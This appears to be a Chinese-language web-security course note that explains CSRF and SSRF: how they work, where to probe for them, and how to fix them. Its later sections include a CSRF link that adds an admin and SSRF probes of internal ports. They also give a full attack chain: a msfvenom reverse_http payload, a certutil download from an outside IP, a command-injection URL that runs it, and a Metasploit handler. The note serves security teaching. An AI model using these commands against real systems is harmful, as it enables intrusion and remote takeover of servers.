#知识点: 逻辑漏洞
1、CSRF-原理&危害&探针&利用等
2、SSRF-原理&危害&探针&利用等
3、CSRF&SSRF-黑盒下漏洞探针点
#详细点:
CSRF 全称:Cross-site request forgery,即,跨站请求伪造,也被称为 “One
Click Attack” 或 “Session Riding”,通常缩写为 CSRF 或者 XSRF,是一种对网
站的恶意利用。举个生活中的例子:就是某个人点了个奇怪的链接,自己什么也没输,但
自己的 qq 号或其他的号就被盗了。即该攻击可以在受害者不知情的情况下以受害者名义
伪造请求,执行恶意操作,具有很大的危害性。
CSRF 的攻击过程两个条件:
1、目标用户已经登录了网站,能够执行网站的功能。
2、目标用户访问了攻击者构造的 URL。
CSRF 安全问题黑盒怎么判断:
- 看验证来源不-修复 ——同源策略
Referer:检测同源,但不是绝对的安全,此头部可以被抓取修改的
- 看凭据有无 token--修复
Token:一种标识,每操作一次,都会进行更改
3、看关键操作有无验证-修复
-CSRF 安全问题白盒怎么审计:
同黑盒思路一样,代码中分析上述三看
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形
成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问
的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离
的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功
能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容,加载指定
地址的图片,下载等等。
-SSRF 黑盒可能出现的地方:
这些是都会向服务器去请求我们所发送的信息,若配置不当,我们输入了访问它自身的地址,则会回显出它自身的情况
1.社交分享功能:获取超链接的标题等内容进行显示
2.转码服务:通过 URL 地址把原地址的网页内容调优使其适合手机屏幕浏览
3.在线翻译:给网址翻译对应网页的内容
4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过 URL 地址加载或下
载图片
5.图片/文章收藏功能:主要其会取 URL 地址中 title 以及文本的内容作为显示以求一
个好的用具体验
6.云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的
信息,就可以进行 ssrf 测试
7.网站采集,网站抓取的地方:一些网站会针对你输入的 url 进行一些信息采集工作
8.数据库内置功能:数据库的比如mongodb的copyDatabase函数
9。邮件系统:比如接收邮件服务器地址
10.编码处理,属性信息处理,文件处理:比如ffpmg,ImageMagick, docx, pdf, xml处理器等
11.未公开的api实现以及其他扩展调用URL的功能:可以利用google 语法(inurl:)加上这些关键字去寻找SSRF漏洞一些的url中的关键字: share. wap、 url、 link. src、 source. target. U、3g、 display、sourceURI、imageURL. domain..
12从远程服务器请求资源(upload from url如discuz! ; import & expost rss feed如weDblog;使用了xml引擎对象的地方如wordpress xmlrpc.php)
-SSRF白盒可能出现的地方:
1、功能点抓包指向代码块审计
2、功能点函数定位代码块审计
-SSRF常见安全修复防御方案:
1.禁用跳转
2、禁用不需要的协议
3、固定或限制资源地址
4、错误信局统一信息处理
#系列内容点:
1、 CSRF&SSRF&原理&利用&协议等
2、 CSRF&SSRF&黑盒&审计&修复等
CSRF-原理&后台自动添加管理员
Ø SSRF-原理&服务&协议&内网&漏洞
Ø SSRF-某实际案例测试演示(功能点)
#CSRF-原理&后台自动添加管理员
-案例说明:小迪在登录后台管理自己网站的时候,突然群里给小迪说阿祖又说爱上别人
了,随后给我发了个 URL 链接,小迪直接点了进去,GG!
小迪的网站:http://test.xiaodi8.com/
发送的 URL:http://47.94.236.117/add.html
点击了此链接,管理员就突然多了一个
需要对网站源码有一定了解,调试合理的数据包
通过调式数据包,进行构造对应的链接地址
利用流程:
1、获取目标的触发数据包
2、利用 CSRFTester 构造导出
3、诱使受害者访问特定地址触发
#SSRF-原理&服务&协议&内网&漏洞
-参考文章:https://www.t00ls.cc/articles-41070.html
-案例说明:小迪在本地创建了远程图片文件加载应用,直接被攻击者利用 SSRF 探针本
地及内网服务,并利用某漏洞直接获取到内网某主机的权限!
解决了内部通讯的问题
1、服务探针:
http://127.0.0.1/ssrf.php
图片功能:
用户:自己将电脑的图片上传,自己给一个URL让服务器解析上传
- 可本地上传到服务器
- 远程加载图片地址上传服务器
服务器:
- 访问图片地址
- 下载图片上传服务器
故:自己上给自己内部请求,达到服务器伪造请求
可以做探针,去探它的内部资源和端口资源
http://127.0.0.1/
http://127.0.0.1:3306/ ——说明本地有安装mysql
内网IP私有地址:
A:10.0.0.0~10.255.255.255
B:172.16.0.0~172.31.255.255
C:192.168.0.0~192.168.255.255
为此我们使用虚拟机来充当内网,进行检测
在虚拟机中构造一个8080端口来进行端口检测
内网捕获成功
注:一般的实战中内网会去做一些IP覆盖等保护手段(如CDN)
2、协议玩法:
file:///D:/w.txt
dict://127.0.0.1:3306/info
ftp://192.168.46.148:21
3、内网扫描:
http://192.168.46.148:8080
以黑盒的角度:对其内网地址进行爆破扫描
4、漏洞利用(理想):
-生成xx.exe:msfvenom -p windows/meterpreter/reverse_http LHOST=47.94.236.117 LPORT=6688 -f exe -o xx.exe
生成文件下载口令certutil.exe -urlcache -split -f http://192.168.162.142:80/xx.exe xx.exe
-监听:
msfconsole
上传木马http://192.168.162.138:8080/?search==%00{.exec|cmd.exe%20/c%20certutil%20-urlcache%20-split%20-f%20http://47.94.236.117/xx.exe.}
建立会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
设置监听状态
set lhost 0.0.0.0
set lport 6688
run
-执行木马:
http://192.168.162.138:8080/?search==%00{.exec|xx.exe.}
上线:
查看服务器端(虚拟机)的任务状态
通常可能会被防火墙等拦截,木马查杀,协议不支持等
#SSRF-某实际案例测试演示(功能点)
基于上述的 SSRF 的漏洞原理,漏洞探针开展黑盒思路分析那些可能存在
1.
正常输入127.0.0.1
当输入http://127.0.0.1,发现页面变了,说明存在ssrf,只是不知道它过滤了多少协议
2.
修改url的内容,访问本地服务器
出了回显,说明存在ssrf
